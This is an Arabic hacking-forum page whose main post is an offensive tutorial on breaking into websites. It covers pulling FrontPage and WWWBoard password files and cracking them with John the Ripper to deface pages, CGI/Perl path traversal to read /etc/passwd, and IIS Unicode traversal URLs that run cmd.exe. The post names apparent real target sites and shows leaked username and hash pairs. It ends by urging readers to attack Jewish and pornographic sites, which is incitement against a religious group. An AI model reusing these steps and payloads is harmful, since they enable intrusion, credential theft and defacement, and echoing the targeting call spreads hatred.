منظمة الانونيموس الاسلامية للاختراق
اهلا بك فى منظمة انيموس الاسلامية للاختراق

دخول

لقد نسيت كلمة السر

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» الحصول على VPS مجانا
السبت 02 يونيو 2018, 4:38 pm من طرف Chuchi

» موقع يعطيك سيرفر في بي اس لمدة شهر - هديه لعيون المنظمه
الأحد 13 مايو 2018, 10:41 pm من طرف anamax

» الدرس الأول ~ الحصول على RDP مجانا ~ دورة الهويـات المجهــولة
الأحد 06 مايو 2018, 1:01 pm من طرف yoyotam

» 10 Days Free Vps Trial 4GB ram+4Cpu
الأحد 29 أبريل 2018, 12:39 am من طرف meno2015r222

»  برنامج اللفلفة ل Conquer Online كااااااامل مكمل باشرح
الأحد 22 أبريل 2018, 7:01 pm من طرف mado40

» اختراق الفيس بوك بالعملاق جوجل
الخميس 12 أبريل 2018, 9:00 pm من طرف ياسين الحنين

» Get 30 days VPS in 30 seconds
الأحد 08 أبريل 2018, 10:56 am من طرف alwayshere2

» شرح كامل الحصول على rdp وكسر البرافيت لعيونكم ^_
الأحد 08 أبريل 2018, 10:54 am من طرف alwayshere2

» طريقتي في جلب حسابات rdp
الثلاثاء 03 أبريل 2018, 7:48 pm من طرف adam42

ديسمبر 2018
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
     12
3456789
10111213141516
17181920212223
24252627282930
31      

اليومية اليومية

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


المتواجدون الآن ؟
ككل هناك 66 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 66 زائر :: 1 روبوت الفهرسة في محركات البحث

لا أحد

[ مُعاينة اللائحة بأكملها ]


أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 176 بتاريخ الخميس 03 نوفمبر 2016, 12:28 am

حصريا شرح ثغرات المنتديات سهله جداا

اذهب الى الأسفل

حصريا شرح ثغرات المنتديات سهله جداا

مُساهمة من طرف Admin في الأحد 10 مارس 2013, 2:42 pm


شرح ثغرات المنتديات سهله جداا

شرح الثغرات واستغلالها
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:

ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل

http://www.****.com/_vti_pvt

يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف

ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع

http://www.netcraft.net/

تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open ***
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق
http://www.heyerlist.org/garderobe/_vti_pvt

-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:


ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو
http://www.boardprep.net/

لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان
http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب
http://members.home.nl/patrick.pagina/temp/Ws-ftp32.zip

- شرح ثغرة سي جي اي وكيفية استغلالها:

CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو
http://www.somesite.com/
فتكتب الثغرة هكذا في المتفح
http://www.somesite.com/cgi-bin/passwd.txt
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd

اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى
http://www.target.com/
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية
http://www.target.com/cgi-bin/hsx.c..../etc/passwd
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:

IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Aacu.../cmd.exe?/c+dir

+c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
أرجو التطبيق على اليهود والمواقع الإباحيه فقط اللهم بلغت اللهم فاشهد
avatar
Admin
Admin
Admin

عدد المساهمات : 1255
تاريخ التسجيل : 22/11/2011
العمر : 22
الموقع : http://ahmed2012.yoo7.com

http://ahmed2012.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى